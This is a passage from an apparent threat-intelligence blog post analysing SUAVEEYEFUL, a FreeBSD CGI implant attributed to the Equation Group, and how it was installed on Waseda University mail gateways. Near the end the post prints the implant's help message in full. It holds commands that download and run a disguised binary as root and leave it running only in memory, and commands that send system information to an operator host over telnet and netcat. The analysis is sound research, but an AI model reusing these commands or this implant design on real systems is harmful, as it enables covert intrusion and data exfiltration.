1024px) 100vw, 1024px" /><figcaption><em>The current website hosted on mail.mfa.gov.cn</em></figcaption></figure></div>


<p>Most of the files included in the leaked directory were designed for another target. The email gateways of the Waseda Research University, which <a href="https://www.waseda.jp/top/en/research">according to its official website</a>, &#8220;strives to conduct cutting-edge research that solves world problems and contributes to the greater good of society. Unorthodox thinking and intellectual curiosity are what drive research at Waseda.&#8221;</p>



<p>The <em>se</em> client had two compromised Waseda email gateways configured, and both accessed via their internal IP addresses from another compromised host, referenced only by its IP address. So, at least 3 systems in Waseda&#8217;s infrastructure were compromised by the EQUATION GROUP since at least 2003.</p>



<ul><li>mp450 (10.1.2.208)</li><li>mg1.waseda.ac.jp (10.9.4.15)</li><li>10.1.2.150 &#8211; <em>another compromised host</em></li></ul>



<p>The top host (<em>mp450)</em> was the university&#8217;s MiraPoint 450 (later renamed to <a href="https://www.digi-link.com.hk/datasheet/antispam/razorgate/razorgate450/datasheet_450.pdf">RazorGate 450</a>), an email security appliance. And the other host (<em>mg1.waseda.ac.jp</em>) was the MiraPoint email gateway. The third host is still unknown, but based on its IP range (similar to that of <em>mp450</em>) we can deduce that it was likely a system located in the university&#8217;s DMZ network segment.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img data-attachment-id="5436" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/se_connect_back_cmd/" data-orig-file="https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg" data-orig-size="1498,722" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="se_connect_back_cmd" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=700" src="https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=1024" alt="" class="wp-image-5436" srcset="https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=1024 1024w, https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=300 300w, https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg?w=768 768w, https://xorl.files.wordpress.com/2022/06/se_connect_back_cmd.jpg 1498w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><em>Simplified visualisation of the SUAVEEYEFUL installation process</em></figcaption></figure></div>


<p></p>



<p><strong><span style="text-decoration:underline;">Installation of SUAVEEYEFUL in Waseda&#8217;s MiraPoint Servers</span></strong></p>



<p>This is clearly described in the <em>opscript.se</em> file which we can assume that it was one of the first operational tasks that the EQUATION GROUP operators executed to install the SUAVEEYEFUL software implant. Here is that process:</p>



<ol><li>Copy the <em>implant</em> to the <em>/var/www/data/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi</em> file</li><li>Change <em>nph-help.cgi</em>&#8216;s file permissions to 555</li><li>Change <em>nph-help.cgi</em>&#8216;s ownership to &#8220;root&#8221; with group &#8220;nobody&#8221;</li><li>Use <em>touch -r</em> to ensure file <em>nph-help.cgi</em> as well as anything under <em>/var/www/data/help/apps/locale/ja_JP.utf-8/utilities/</em> directory have the same timestamps as the legitimate <em>/var/www/data/help/apps/locale/ja_JP.utf-8/utilities/publish.html</em> MiraPoint web service</li><li>Use <em>netcat</em> to start a listening on port 444, decoding the received data with Base64 and decrypting them using <em>bdes</em> with a hardcoded key (<em>0x4790cae5ec154ccc</em> in this case)</li><li>Connect-back from <em>mp450</em>&#8216;s SUAVEEYEFUL implant to the listening 4444 port and provide some basic system information (who is logged in, list files/directories, etc.)</li></ol>



<p><strong><span style="text-decoration:underline;">The SUAVEEYEFUL Software Implant</span></strong></p>



<p>The SUAVEEYEFUL (or SE) has two components, the client and the server. The server component is a very simple <a href="https://en.wikipedia.org/wiki/Common_Gateway_Interface">CGI</a> program written in C for FreeBSD, and looking for input at its <em>help</em> endpoint. Any commands received would be executed (with root privileges as shown in the previous section) using the <em><a href="https://www.freebsd.org/cgi/man.cgi?system(3)">system()</a></em> library call, as long as they match the defined format (described later in this post).</p>



<p>The client side ensures that all requests are properly requested, encoded (using Base64) and encrypted (with DES). The client supported 4 options:</p>



<ul><li><strong>-h</strong>: Display help message</li><li><strong>-c</strong>: Execute command</li><li><strong>-i</strong>: Input target (e.g. the URL of a host running the SE server component)</li><li><strong>-k</strong>: Key used for DES encryption</li></ul>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img data-attachment-id="5427" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/se_client/" data-orig-file="https://xorl.files.wordpress.com/2022/06/se_client.jpg" data-orig-size="3296,1594" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="se_client" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=700" src="https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=1024" alt="" class="wp-image-5427" srcset="https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=1024 1024w, https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=2048 2048w, https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=300 300w, https://xorl.files.wordpress.com/2022/06/se_client.jpg?w=768 768w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><em>Screenshot of the se client used to target the Waseda University</em></figcaption></figure></div>


<p>As we can see from this, for the generation of the cryptographic material, EQUATION GROUP was using the system&#8217;s /dev/random in the following way:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: bash; title: ; notranslate" title="">
head -c 8 /dev/random | hexdump -e '/8 \"0x%016x\n\"'
</pre></div>


<p>The command was then structured with <em>#</em> being used as a separator. The main command to be executed was constructed with this:</p>


<div class="wp-block-syntaxhighlighter-code "><pre class="brush: bash; title: ; notranslate" title="">
echo &quot;`head -c 8 /dev/random | hexdump -e '/8 &quot;%016x\n&quot;'`#`date +&quot;%s&quot;`#$cmd&quot;|bdes -k $key &gt; out
</pre></div>


<p>Which results into a format that looks like that:</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img data-attachment-id="5430" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/se_structure/" data-orig-file="https://xorl.files.wordpress.com/2022/06/se_structure.jpg" data-orig-size="1445,94" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="se_structure" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=700" src="https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=1024" alt="" class="wp-image-5430" srcset="https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=1024 1024w, https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=300 300w, https://xorl.files.wordpress.com/2022/06/se_structure.jpg?w=768 768w, https://xorl.files.wordpress.com/2022/06/se_structure.jpg 1445w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure></div>


<p>This structure was then encrypted using the hardcoded DES key, and passed through <em>uriescape</em> tool to ensure that there will be no parsing issues by the receiving MiraPoint web server.</p>



<p>Apart from the above, the client also used the <em>date +&#8221;%N&#8221;</em> command to get the date in nanoseconds and encrypt it with a key matching the same value. This was an anti-analysis/anti-detection trick since it would be hard for anyone to get the SE software implant to execute any command without this non-intuitive addition to its expected input.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img data-attachment-id="5432" data-permalink="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/se_sending_cmd/" data-orig-file="https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg" data-orig-size="711,159" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="se_sending_cmd" data-image-description="" data-image-caption="" data-medium-file="https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg?w=300" data-large-file="https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg?w=700" src="https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg?w=711" alt="" class="wp-image-5432" srcset="https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg 711w, https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg?w=150 150w, https://xorl.files.wordpress.com/2022/06/se_sending_cmd.jpg?w=300 300w" sizes="(max-width: 711px) 100vw, 711px" /><figcaption><em>The generation of the three values and sending the full command message to the compromised system running the SUAVEEYEFUL software implant server component</em></figcaption></figure></div>


<p>Lastly, the SE help message displayed three instructions on example commands that the operator could use. The three help commands were performing the following tasks:</p>



<ol><li>Install a fileless malware by doing the following:<ul><li>Create a hidden directory (<em>/tmp/.scsi</em>)</li><li>Use <em>curl</em> to download a binary deceivingly named <em>sendmail</em> from the operational host (<em>10.1.2.150:5555/sendmail</em>)</li><li>Run <em>sendmail</em> as root and connect-back to the operational host on a different port (<em>10.1.2.150:9999</em>)</li><li>Remove the <em>sendmail</em> binary file so that it&#8217;s running only in memory, not from the filesystem</li></ul></li><li>Execute commands with connect-back method:<ul><li>Run <em>w</em> followed by <em>ls -l</em> and <em>ls -l /tmp</em> to get the logged in users and contents of the current and <em>/tmp</em> directories</li><li>Encrypt and encode the output</li><li>Send it to the operational host on its listening port (<em>10.1.2.150:4444</em>)</li><li>The message also guides the operator on how to generate a new DES encryption key</li></ul></li><li>Same as #2 but without the Base64 encoding and DES encryption</li></ol>



<p>Here is the full help message:</p>



<pre class="wp-block-code"><code>1) se -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/curl http://10.1.2.150:5555/sendmail -osendmail;chmod +x sendmail;D=-c10.1.2.150:9999 PATH=. /usr/bin/asroot sendmail;rm -f sendmail) &gt; /dev/null 2&gt;&amp;1" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 

2) se -c"(w; ls -l; ls -l /tmp) | bdes -k SECRET | mmencode | telnet 10.1.2.150 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444 | decode-base64 | bdes -d -k SECRET

Use this to generate a random key and replace SECRET with the key
  head -c 8 /dev/random | hexdump -e '/8 "0x%016x\n"'

3) se -c"(w; ls -l; ls -l /tmp) | telnet 10.1.2.150 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444

WARNING
WARNING

DO NOT -burn!!!
Use -exit</code></pre>
<div id="jp-post-flair" class="sharedaddy sd-like-enabled sd-sharing-enabled"><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon-text sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-reddit"><a rel="nofollow noopener noreferrer" data-shared="" class="share-reddit sd-button share-icon" href="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/?share=reddit" target="_blank" title="Click to share on Reddit" ><span>Reddit</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-5412" class="share-facebook sd-button share-icon" href="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/?share=facebook" target="_blank" title="Click to share on Facebook" ><span>Facebook</span></a></li><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-5412" class="share-twitter sd-button share-icon" href="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/?share=twitter" target="_blank" title="Click to share on Twitter" ><span>Twitter</span></a></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button share-icon" href="mailto:?subject=%5BShared%20Post%5D%20The%20forgotten%20SUAVEEYEFUL%20FreeBSD%20software%20implant%20of%20the%20EQUATION%20GROUP&body=https%3A%2F%2Fxorl.wordpress.com%2F2022%2F06%2F22%2Fthe-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group%2F&share=email" target="_blank" title="Click to email a link to a friend" data-email-share-error-title="Do you have email set up?" data-email-share-error-text="If you&#039;re having problems sharing via email, you might not have email set up for your browser. You may need to create a new email yourself." data-email-share-nonce="3e310353f7" data-email-share-track-url="https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/?share=email"><span>Email</span></a></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-6013855-5412-62fd122a3d0e4' data-src='//widgets.wp.com/likes/index.html?ver=20220105#blog_id=6013855&amp;post_id=5412&amp;origin=xorl.wordpress.com&amp;obj_id=6013855-5412-62fd122a3d0e4' data-name='like-post-frame-6013855-5412-62fd122a3d0e4' data-title='Like or Reblog'><h3 class='sd-title'>Like this:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Like</span></span> <span class="loading">Loading...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Related</em></h3>
</div></div>			</div>

	<div class="meta group">
		<div class="signature">
			<p>Written by xorl <span class="edit"></span></p>
			<p>June 22, 2022 at 10:19</p>
		</div>
		<div class="tags">
			<p>Posted in <a href="https://xorl.wordpress.com/category/reverse-engineering/" rel="category tag">reverse engineering</a>, <a href="https://xorl.wordpress.com/category/threat-intelligence/" rel="category tag">threat intelligence</a></p>
					</div>
	</div>
</div>
<div class="navigation group">
	<div class="alignleft">&laquo; <a href="https://xorl.wordpress.com/2022/04/07/ideas-for-software-supply-chain-attacks-simulation-by-red-teams/" rel="prev">Ideas for Software Supply-Chain Attacks Simulation by Red&nbsp;Teams</a></div>
	<div class="alignright"><a href="https://xorl.wordpress.com/2022/07/06/why-the-equation-group-eqgrp-is-not-the-nsa/" rel="next">Why the Equation Group (EQGRP) is NOT the&nbsp;NSA</a> &raquo;</div>
</div>


<a name="comments" id="comments"></a>




	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply</h3><form action="https://xorl.wordpress.com/wp-comments-post.php" method="post" id="commentform" class="comment-form"><input type="hidden" id="highlander_comment_nonce" name="highlander_comment_nonce" value="9610c25752" /><input type="hidden" name="_wp_http_referer" value="/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/" />
<input type="hidden" name="hc_post_as" id="hc_post_as" value="guest" />

<div class="comment-form-field comment-textarea">
	<label for="comment">Enter your comment here...</label>
	<div id="comment-form-comment"><textarea id="comment" name="comment" title="Enter your comment here..."></textarea></div>
</div>

<div id="comment-form-identity">
	<div id="comment-form-nascar">
		<p>Fill in your details below or click an icon to log in:</p>
		<ul>
			<li class="selected" style="display:none;">
				<a href="#comment-form-guest" id="postas-guest" class="nascar-signin-link"
				 title="Login via Guest" 				>
									</a>
			</li>
			<li>
				<a href="#comment-form-load-service:WordPress.com" id="postas-wordpress" class="nascar-signin-link"
				 title="Login via WordPress.com" 				>
					<svg xmlns="http://www.w3.org/2000/svg" role="presentation" viewBox="0 0 24 24" ><rect x="0" fill="none" width="24" height="24"/><g><path fill="#0087be" d="M12.158 12.786l-2.698 7.84c.806.236 1.657.365 2.54.365 1.047 0 2.05-.18 2.986-.51-.024-.037-.046-.078-.065-.123l-2.762-7.57zM3.008 12c0 3.56 2.07 6.634 5.068 8.092L3.788 8.342c-.5 1.117-.78 2.354-.78 3.658zm15.06-.454c0-1.112-.398-1.88-.74-2.48-.456-.74-.883-1.368-.883-2.11 0-.825.627-1.595 1.51-1.595.04 0 .078.006.116.008-1.598-1.464-3.73-2.36-6.07-2.36-3.14 0-5.904 1.613-7.512 4.053.21.008.41.012.58.012.94 0 2.395-.114 2.395-.114.484-.028.54.684.057.74 0 0-.487.058-1.03.086l3.275 9.74 1.968-5.902-1.4-3.838c-.485-.028-.944-.085-.944-.085-.486-.03-.43-.77.056-.742 0 0 1.484.114 2.368.114.94 0 2.397-.114 2.397-.114.486-.028.543.684.058.74 0 0-.488.058-1.03.086l3.25 9.665.897-2.997c.456-1.17.684-2.137.684-2.907zm1.82-3.86c.04.286.06.593.06.924 0 .912-.17 1.938-.683 3.22l-2.746 7.94c2.672-1.558 4.47-4.454 4.47-7.77 0-1.564-.4-3.033-1.1-4.314zM12 22C6.486 22 2 17.514 2 12S6.486 2 12 2s10 4.486 10 10-4.486 10-10 10z"/></g></svg>				</a>
			</li>
			<li>
				<a href="#comment-form-load-service:Twitter" id="postas-twitter" class="nascar-signin-link"
				 title="Login via Twitter" 				>
					<svg xmlns="http://www.w3.org/2000/svg" role="presentation" viewBox="0 0 24 24" ><rect x="0" fill="none" width="24" height="24"/><g><path fill="#1DA1F2" d="M22.23 5.924c-.736.326-1.527.547-2.357.646.847-.508 1.498-1.312 1.804-2.27-.793.47-1.67.812-2.606.996C18.325 4.498 17.258 4 16.078 4c-2.266 0-4.103 1.837-4.103 4.103 0 .322.036.635.106.935-3.41-.17-6.433-1.804-8.457-4.287-.353.607-.556 1.312-.556 2.064 0 1.424.724 2.68 1.825 3.415-.673-.022-1.305-.207-1.86-.514v.052c0 1.988 1.415 3.647 3.293 4.023-.344.095-.707.145-1.08.145-.265 0-.522-.026-.773-.074.522 1.63 2.038 2.817 3.833 2.85-1.404 1.1-3.174 1.757-5.096 1.757-.332 0-.66-.02-.98-.057 1.816 1.164 3.973 1.843 6.29 1.843 7.547 0 11.675-6.252 11.675-11.675 0-.178-.004-.355-.012-.53.802-.578 1.497-1.3 2.047-2.124z"/></g></svg>				</a>
			</li>
			<li>
				<a href="#comment-form-load-service:Facebook" id="postas-facebook" class="nascar-signin-link"
				 title="Login via Facebook" 				>
					<svg xmlns="http://www.w3.org/2000/svg" role="presentation" viewBox="0 0 24 24" ><rect x="0" fill="none" width="24" height="24"/><g><path fill="#3B5998" d="M20.007 3H3.993C3.445 3 3 3.445 3 3.993v16.013c0 .55.445.994.993.994h8.62v-6.97H10.27V11.31h2.346V9.31c0-2.325 1.42-3.59 3.494-3.59.993 0 1.847.073 2.096.106v2.43h-1.438c-1.128 0-1.346.537-1.346 1.324v1.734h2.69l-.35 2.717h-2.34V21h4.587c.548 0 .993-.445.993-.993V3.993c0-.548-.445-.993-.993-.993z"/></g></svg>				</a>
			</li>
		</ul>
	</div>

	<div id="comment-form-guest" class="comment-form-service selected">
		<div class="comment-form-padder">
			<div class="comment-form-avatar">
<a href="https://gravatar.com/site/signup/" target="_blank">				<img src="https://s0.wp.com/i/mu.gif" alt="Gravatar" width="25" class="no-grav" />
</a>			</div>

				<div class="comment-form-fields">
				<div class="comment-form-field comment-form-email">
					<label for="email">Email <span class="required">(required)</span> <span class="nopublish">(Address never made public)</span></label>
					<div class="comment-form-input"><input id="email" name="email" type="email" value="" /></div>
				</div>
				<div class="comment-form-field comment-form-author">
					<label for="author">Name <span class="required">(required)</span></label>
					<div class="comment-form-input"><input id="author" name="author" type="text" value="" /></div>
				</div>
				<div class="comment-form-field comment-form-url">
					<label for="url">Website</label>
					<div class="comment-form-input"><input id="url" name="url" type="url" value="" /></div>
				</div>
			</div>
			
		</div>
	</div>

	<div id="comment-form-wordpress" class="comment-form-service">
		<div class="comment-form-padder">
			<div class="comment-form-avatar">
				<img src="https://s0.wp.com/i/mu.gif" alt="WordPress.com Logo" width="25" class="no-grav" />
			</div>

				<div class="comment-form-fields">
				<input type="hidden" name="wp_avatar" id="wordpress-avatar" class="comment-meta-wordpress" value="" />
				<input type="hidden" name="wp_user_id" id="wordpress-user_id" class="comment-meta-wordpress" value="" />
				<input type="hidden" name="wp_access_token" id="wordpress-access_token" class="comment-meta-wordpress" value="" />
						<p class="comment-form-posting-as pa-wordpress">
			<strong></strong>
			You are commenting using your WordPress.com account.			<span class="comment-form-log-out">
				(&nbsp;<a href="javascript:HighlanderComments.doExternalLogout( 'wordpress' );">Log&nbsp;Out</a>&nbsp;/&nbsp;
				<a href="#" onclick="javascript:HighlanderComments.switchAccount();return false;">Change</a>&nbsp;)
			</span>
			<span class="pa-icon"><svg xmlns="http://www.w3.org/2000/svg" role="presentation" viewBox="0 0 24 24" ><rect x="0" fill="none" width="24" height="24"/><g><path fill="#0087be" d="M12.158 12.786l-2.698 7.84c.806.236 1.657.365 2.54.365 1.047 0 2.05-.18 2.986-.51-.024-.037-.046-.078-.065-.123l-2.762-7.57zM3.008 12c0 3.56 2.07 6.634 5.068 8.092L3.788 8.342c-.5 1.117-.78 2.354-.78 3.658zm15.06-.454c0-1.112-.398-1.88-.74-2.48-.456-.74-.883-1.368-.883-2.11 0-.825.627-1.595 1.51-1.595.04 0 .078.006.116.008-1.598-1.464-3.73-2.36-6.07-2.36-3.14 0-5.904 1.613-7.512 4.053.21.008.41.012.58.012.94 0 2.395-.114 2.395-.114.484-.028.54.684.057.74 0 0-.487.058-1.03.086l3.275 9.74 1.968-5.902-1.4-3.838c-.485-.028-.944-.085-.944-.085-.486-.03-.43-.77.056-.742 0 0 1.484.114 2.368.114.94 0 2.397-.114 2.397-.114.486-.028.543.684.058.74 0 0-.488.058-1.03.086l3.25 9.665.897-2.997c.456-1.17.684-2.137.684-2.907zm1.82-3.86c.04.286.06.593.06.924 0 .912-.17 1.938-.683 3.22l-2.746 7.94c2.672-1.558 4.47-4.454 4.47-7.77 0-1.564-.4-3.033-1.1-4.314zM12 22C6.486 22 2 17.514 2 12S6.486 2 12 2s10 4.486 10 10-4.486 10-10 10z"/></g></svg></span>
		</p>
					</div>
	
		</div>
	</div>

	<div id="comment-form-twitter" class="comment-form-service">
		<div class="comment-form-padder">
			<div class="comment-form-avatar">
				<img src="https://s0.wp.com/i/mu.gif" alt="Twitter picture" width="25" class="no-grav" />
			</div>

				<div class="comment-form-fields">
				<input type="hidden" name="twitter_avatar" id="twitter-avatar" class="comment-meta-twitter" value="" />
				<input type="hidden" name="twitter_user_id" id="twitter-user_id" class="comment-meta-twitter" value="" />
				<input type="hidden" name="twitter_access_token" id="twitter-access_token" class="comment-meta-twitter" value="" />
						<p class="comment-form-posting-as pa-twitter">
			<strong></strong>
			You are commenting using your Twitter account.			<span class="comment-form-log-out">
				(&nbsp;<a href="javascript:HighlanderComments.doExternalLogout( 'twitter' );">Log&nbsp;Out</a>&nbsp;/&nbsp;
				<a href="#" onclick="javascript:HighlanderComments.switchAccount();return false;">Change</a>&nbsp;)
			</span>
			<span class="pa-icon"><svg xmlns="http://www.w3.org/2000/svg" role="presentation" viewBox="0 0 24 24" ><rect x="0" fill="none" width="24" height="24"/><g><path fill="#1DA1F2" d="M22.23 5.924c-.736.326-1.527.547-2.357.646.847-.508 1.498-1.312 1.804-2.27-.793.47-1.67.812-2.606.996C18.325 4.498 17.258 4 16.078 4c-2.266 0-4.103 1.837-4.103 4.103 0 .322.036.635.106.935-3.41-.17-6.433-1.804-8.457-4.287-.353.607-.556 1.312-.556 2.064 0 1.424.724 2.68 1.825 3.415-.673-.022-1.305-.207-1.86-.514v.052c0 1.988 1.415 3.647 3.293 4.023-.344.095-.707.145-1.08.145-.265 0-.522-.026-.773-.074.522 1.63 2.038 2.817 3.833 2.85-1.404 1.1-3.174 1.757-5.096 1.757-.332 0-.66-.02-.98-.057 1.816 1.164 3.973 1.843 6.29 1.843 7.547 0 11.675-6.252 11.675-11.675 0-.178-.004-.355-.012-.53.802-.578 1.497-1.3 2.047-2.124z"/></g></svg></span>
		</p>
					</div>
	
		</div>
	</div>

	<div id="comment-form-facebook" class="comment-form-service">
		<div class="comment-form-padder">
			<div class="comment-form-avatar">
				<img src="" alt="Facebook photo" width="25" class="no-grav" />
			</div>

				<div class="comment-form-fields">
				<input type="hidden" name="fb_avatar" id="facebook-avatar" class="comment-meta-facebook" value="" />
				<input type="hidden" name="fb_user_id" id="facebook-user_id" class="comment-meta-facebook" value="" />
				<input type="hidden" name="fb_access_token" id="facebook-access_token" class="comment-meta-facebook" value="" />
						<p class="comment-form-posting-as pa-facebook">
			<strong></strong>
			You are commenting using your Facebook account.			<span class="comment-form-log-out">
				(&nbsp;<a href="javascript:HighlanderComments.doExternalLogout( 'facebook' );">Log&nbsp;Out</a>&nbsp;/&nbsp;
				<a href="#" onclick="javascript:HighlanderComments.switchAccount();return false;">Change</a>&nbsp;)
			</span>
			<span class="pa-icon"><svg xmlns="http://www.w3.org/2000/svg" role="presentation" viewBox="0 0 24 24" ><rect x="0" fill="none" width="24" height="24"/><g><path fill="#3B5998" d="M20.007 3H3.993C3.445 3 3 3.445 3 3.993v16.013c0 .55.445.994.993.994h8.62v-6.97H10.27V11.31h2.346V9.31c0-2.325 1.42-3.59 3.494-3.59.993 0 1.847.073 2.096.106v2.43h-1.438c-1.128 0-1.346.537-1.346 1.324v1.734h2.69l-.35 2.717h-2.34V21h4.587c.548 0 .993-.445.993-.993V3.993c0-.548-.445-.993-.993-.993z"/></g></svg></span>
		</p>
					</div>
	
		</div>
	</div>


	<div id="comment-form-load-service" class="comment-form-service">
		<div class="comment-form-posting-as-cancel"><a href="javascript:HighlanderComments.cancelExternalWindow();">Cancel</a></div>
		<p>Connecting to %s</p>
	</div>

</div>

<script type="text/javascript">
var highlander_expando_javascript = function () {

	function hide( sel ) {
		var el = document.querySelector( sel );
		if ( el ) {
			el.style.setProperty( 'display', 'none' );
		}
	}

	function show( sel ) {
		var el = document.querySelector( sel );
		if ( el ) {
			el.style.removeProperty( 'display' );
		}
	}

	var input = document.createElement( 'input' );
	var comment = document.querySelector( '#comment' );

	if ( input && comment && 'placeholder' in input ) {
		var label = document.querySelector( '.comment-textarea label' );
		if ( label ) {
			var text = label.textContent;
			label.parentNode.removeChild( label );
			comment.setAttribute( 'placeholder', text );
		}
	}

	// Expando Mode: start small, then auto-resize on first click + text length
	hide( '#comment-form-identity' );
	hide( '#comment-form-subscribe' );
	hide( '#commentform .form-submit' );

	if ( comment ) {
		comment.style.height = '10px';

		var handler = function () {
			comment.style.height = HighlanderComments.initialHeight + 'px';
			show( '#comment-form-identity' );
			show( '#comment-form-subscribe' );
			show( '#commentform .form-submit' );
			HighlanderComments.resizeCallback();

			comment.removeEventListener( 'focus', handler );
		};

		comment.addEventListener( 'focus', handler );
	}
}

if ( document.readyState !== 'loading' ) {
	highlander_expando_javascript();
} else {
	document.addEventListener( 'DOMContentLoaded', highlander_expando_javascript );
}

</script>

<div id="comment-form-subscribe">
	<p class="comment-subscription-form"><input type="checkbox" name="subscribe" id="subscribe" value="subscribe" style="width: auto;"/> <label class="subscribe-label" id="subscribe-label" for="subscribe" style="display: inline;">Notify me of new comments via email.</label></p></div>

<style type="text/css">
#respond .comment-form-avatar { display: none !important; }
#respond .comment-form-fields { margin-left: 0 !important; }
#respond .comment-form-cookies-consent { margin-left: 0 !important; }
</style>




<p class="form-submit"><input name="submit" type="submit" id="comment-submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='5412' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="7271078cfa" /></p>
<input type="hidden" name="genseq" value="1660752426" />
<p style="display: none !important;"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js" value="8"/><script>document.getElementById( "ak_js_1" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form>	</div><!-- #respond -->
